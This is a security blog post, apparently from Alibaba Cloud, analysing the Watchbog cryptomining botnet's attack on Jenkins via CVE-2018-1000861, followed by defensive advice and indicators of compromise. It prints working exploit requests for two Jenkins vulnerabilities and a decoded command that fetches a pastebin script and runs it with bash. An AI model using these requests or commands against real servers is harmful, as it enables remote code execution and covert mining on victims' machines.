Return of Watchbog: Exploiting Jenkins CVE-2018–1000861

Alibaba Cloud
4 min readMay 21, 2019

--

On May 12th 2019, we observed Watchbog, a cryptocurrency-mining botnet, started a grand attack aiming at Jenkins. Infected servers do not automatically attack its peers, meaning that the trojan itself is not contagious. However, it still cause loss to victim users by mining cryptocurrency and adding malicious commands to scheduled task for persistence.

Watchbog botnet is not new; it has previous conviction. Earlier this year, we detected watchbog attacking services such as Nexus Repository Manager 3, ThinkPHP and Linux Supervisord and deploying miners with highly similar technique. The process is very straightforward, as shown below:

This article gives insight into the attack event and provides suggestion for cleaning malware and preventing future intrusion.

Start of Attack

We found this request on a victim Jenkins server, exploiting CVE-2018–1000861 :

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1
Host: [victim_host]:[jenkins_port]

This payload is different from another exploit targeting CVE-2019–1003000 we have seen in another botnet event by ImposterMiner in February:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1
Host: [victim_host]:[jenkins_port]

The two payloads look alike because they both use the “/securityRealm/user/admin/descriptorByName” gadget. Yet they are essentially different in that CVE-2018–1000861 is a vulnerability in Jenkins’ Stapler web framework, while CVE-2019–1003000 is in Script Security Plugin.

The hex-encoded part in the former CVE-2018–1000861 payload downloads and runs malicious shell command:

wget https://pastebin.com/raw/B3R5Unwh -O /tmp/baby
bash /tmp/baby

The contained url points to another pastebin url (https://pastebin.com/raw/J6NdVBHq), which points to yet another.

The main part of malicious shell script is encoded and placed in https://pastebin.com/raw/KGwfArMR.

Mining and Persistence

During execution of the aforesaid shell script, a cryptocurrency miner is installed on victim server by downloading from following URL (decoded from $mi_64)

https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz

Configuration file for mining is as follows:

The malicious shell script maintain persistence by adding itself to crontab.

Other tampered crontab files:

An ironic thing is that the threat actor says victims can contact him at jeff4r-partner@tutanota.com and promises to offer “cleanup script, source of entry and patch”.

According to minexmr.com, the threat actor may have earned about 20 Moneros (1500USD) as economic profit from mining.

Another thing worth mentioning is that we have reported malicious URLs to pastebin.com and request to ban those addresses when watchbog first started its attack in March. However pastebin.com has not replied or taken any effective action.

Security Suggestion

  • Services for internal use should not be exposed to the Internet. Use adequate ACL or other authentication techniques to only allow access from trusted users.
  • It is necessary for users to upgrade their software in time, especially when the vendor of software has published security-related advisory.
  • Since pastebin.com has been used by many botnets, users who do not often visit this website may use some tricks to drop packets to and from it, such as on Linux you can run: echo -e "\n0.0.0.0 pastebin.com" >> /etc/hosts This command sinkholes(redirects) any traffic to and from pastebin.com.
  • Cloud firewalls are useful in preventing attacks. We recommend Alibaba Cloud Firewall because it is able to detect, block and analyze threats. You will be protected from intrusion and malicious mining with AI technologies on your side.
  • Alibaba Cloud Managed Security Service enables users to call on expertise of Alibaba’s security specialists, who will help you clean up malware, improve configurations, and enhance overall security. If you are concerned about your organization’s security, you should give it a try.

IOC

wallet:

44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B (previous)
47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 (current)

pool address:

pool.minexmr.com:80
pool.minexmr.com:443

url:

https://pastebin.com/raw/B3R5Unwh
https://pastebin.com/raw/J6NdVBHq
https://pastebin.com/raw/KGwfArMR
https://pastebin.com/raw/AgdgACUD
https://pastebin.com/raw/vvuYb1GC
https://pastebin.com/raw/aGTSGJJp
https://pastebin.com/raw/05p0fTYd
https://pastebin.com/raw/KxWPFeEn
https://pastebin.com/raw/X6wvuv98
https://pixeldra.in/api/download/nZ2s4L

md5:

65cfcad6dc3d31695b8f3ffa08e5d389
95721de55ad89005484b4c21f768d94e
157495f6ba8c36c38984d1f902cf3ac0
314097a1d41697352c961026aa1ed87c
1dbd97c70a89e64cbfb65c78ac39938e

local path:

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2018-1000861

https://www.alibabacloud.com/blog/imposterminer-trojan-takes-advantage-of-newly-published-jenkins-rce-vulnerability_594729

Reference:https://www.alibabacloud.com/blog/return-of-watchbog-exploiting-jenkins-cve-2018-1000861_594798?spm=a2c41.12883405.0.0

--

--

Alibaba Cloud
Alibaba Cloud

Written by Alibaba Cloud

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

No responses yet